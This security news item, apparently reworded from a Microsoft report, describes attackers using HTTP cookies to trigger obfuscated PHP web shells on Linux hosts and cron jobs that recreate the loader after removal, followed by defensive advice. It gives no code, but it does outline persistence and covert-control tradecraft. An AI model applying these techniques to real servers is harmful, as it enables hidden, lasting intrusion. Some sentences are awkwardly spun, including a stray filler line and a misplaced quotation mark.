Threat actors are using cookies as a secret way to talk to PHP-based web shells on Linux servers This article explores cookies threat actors. . This method lets them get around standard URL parameters or request body methods, which lets them run code from a distance.

Cookies blend in with regular web traffic and make it harder to see, so this method is unlikely to raise any red flags. Microsoft suggests using multi-factor authentication for hosting control panels, SSH access, and administrative interfaces. It also suggests keeping an eye on unusual login activity, preventing shell interpreters from running on web servers, checking for suspicious file creation in web directories, and limiting the capabilities of hosts control panels.

"Instead of using complicated exploit chains, the threat actor used legitimate execution paths that were already in place, such as web server processes, control panel components, and cron infrastructure, to stage and keep malicious code," Microsoft said. The company said that the consistent use of cookies as the control mechanism shows that established web shell tradecraft is being used again. "The company went on to say, "By putting control logic into cookies, threat actors make it possible for persistent post-compromise access that can get around many traditional inspection and logging controls."

The bad guys first got into a victim's hosted Linux environment by using valid credentials or taking advantage of a known security hole to set up a cron job that runs a shell routine that runs an obfuscated PHP loader on a regular basis.

Once it is installed, the PHP loader stays inactive during normal traffic but wakes up when it gets HTTP requests with certain cookie values. Microsoft said in a blog post that the "self-healing" architecture lets the scheduled task recreate the PHP loader over and over again, even if it was removed as part of cleanup efforts. This makes sure that the remote code execution channel is always available and reliable.